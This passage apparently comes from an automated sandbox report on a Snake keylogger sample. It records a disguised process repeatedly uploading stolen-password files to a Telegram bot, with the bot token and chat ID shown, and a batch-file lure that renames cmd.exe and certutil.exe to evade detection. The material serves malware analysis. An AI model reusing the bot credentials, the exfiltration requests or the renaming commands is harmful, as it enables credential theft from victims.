2024-12-18 15:32:23 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd227d39ecb039
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:32:23 UTC | 535 | OUT | Data Ascii: --------------------------8dd227d39ecb039Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:32:24 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:24 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:24 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419242,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535944,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        113192.168.2.849920149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:24 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2565e5b25501
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:24 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 35 36 35 65 35 62 32 35 35 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd2565e5b25501Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:25 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:24 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:25 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419244,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535944,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
114 | 192.168.2.8 | 49922 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:25 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd245aeb8c82be
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:32:25 UTC | 535 | OUT | Data Ascii: --------------------------8dd245aeb8c82beContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:32:25 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:25 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 517
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:25 UTC | 517 | IN | Data Ascii: {"ok":true,"result":{"message_id":419246,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535945,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
115 | 192.168.2.8 | 49924 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:25 UTC | 352 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd22be5581407d
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
2024-12-18 15:32:25 UTC | 535 | OUT | Data Ascii: --------------------------8dd22be5581407dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:32:26 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:26 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:26 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419248,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535946,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
116 | 192.168.2.8 | 49927 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:26 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd26038213f839
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:32:26 UTC | 535 | OUT | Data Ascii: --------------------------8dd26038213f839Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:32:26 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:26 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:26 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419250,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535946,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
117 | 192.168.2.8 | 49930 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:27 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd24a8fb2c45b9
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:32:27 UTC | 535 | OUT | Data Ascii: --------------------------8dd24a8fb2c45b9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:32:27 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:27 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:27 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419252,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535947,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
118 | 192.168.2.8 | 49931 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:27 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd22fa34213483
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:32:27 UTC | 535 | OUT | Data Ascii: --------------------------8dd22fa34213483Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:32:28 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:28 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:28 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419254,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535948,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
119 | 192.168.2.8 | 49934 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:28 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2698048ede00
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:32:28 UTC | 535 | OUT | Data Ascii: --------------------------8dd2698048ede00Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:32:28 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:28 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:28 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419256,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535948,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
120 | 192.168.2.8 | 49938 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:29 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd24f586dd246f
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:32:29 UTC | 535 | OUT | Data Ascii: --------------------------8dd24f586dd246fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:32:30 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:30 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:30 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419258,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535950,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
121 | 192.168.2.8 | 49939 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:29 UTC | 352 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd23336ff9d791
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
2024-12-18 15:32:29 UTC | 535 | OUT | Data Ascii: --------------------------8dd23336ff9d791Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:32:30 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:30 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:30 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419260,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535950,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
122 | 192.168.2.8 | 49940 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:30 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd271e66cb8366
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:32:30 UTC | 535 | OUT | Data Ascii: --------------------------8dd271e66cb8366Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:32:30 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:30 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:30 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419262,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535950,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
123 | 192.168.2.8 | 49946 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:31 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd253f1bc168da
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:32:31 UTC | 535 | OUT | Data Ascii: --------------------------8dd253f1bc168daContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:32:32 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:32 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:32 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419264,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535952,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
124 | 192.168.2.8 | 49947 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:31 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd235621b119df
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:32:31 UTC | 535 | OUT | Data Ascii: --------------------------8dd235621b119dfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:32:32 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:32 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:32 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419266,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535952,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
125 | 192.168.2.8 | 49948 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:36 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd27765a939a1a
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:32:36 UTC | 535 | OUT | Data Ascii: --------------------------8dd27765a939a1aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:32:36 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:36 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:36 UTC 515 IN
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419270,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535956,"documen



                                                                                                        Target ID:0
                                                                                                        Start time:10:30:24
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "
                                                                                                        Imagebase:0x7ff605f50000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:1
                                                                                                        Start time:10:30:24
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:3
                                                                                                        Start time:10:30:24
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\System32\extrac32.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                                                                                        Imagebase:0x7ff7ed270000
                                                                                                        File size:35'328 bytes
                                                                                                        MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        Target ID:4
                                                                                                        Start time:10:30:25
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                        Imagebase:0x7ff7ab120000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:5
                                                                                                        Start time:10:30:25
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\System32\extrac32.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                        Imagebase:0x7ff7ed270000
                                                                                                        File size:35'328 bytes
                                                                                                        MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        Target ID:6
                                                                                                        Start time:10:30:25
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                                        Wow64 process (32bit):false
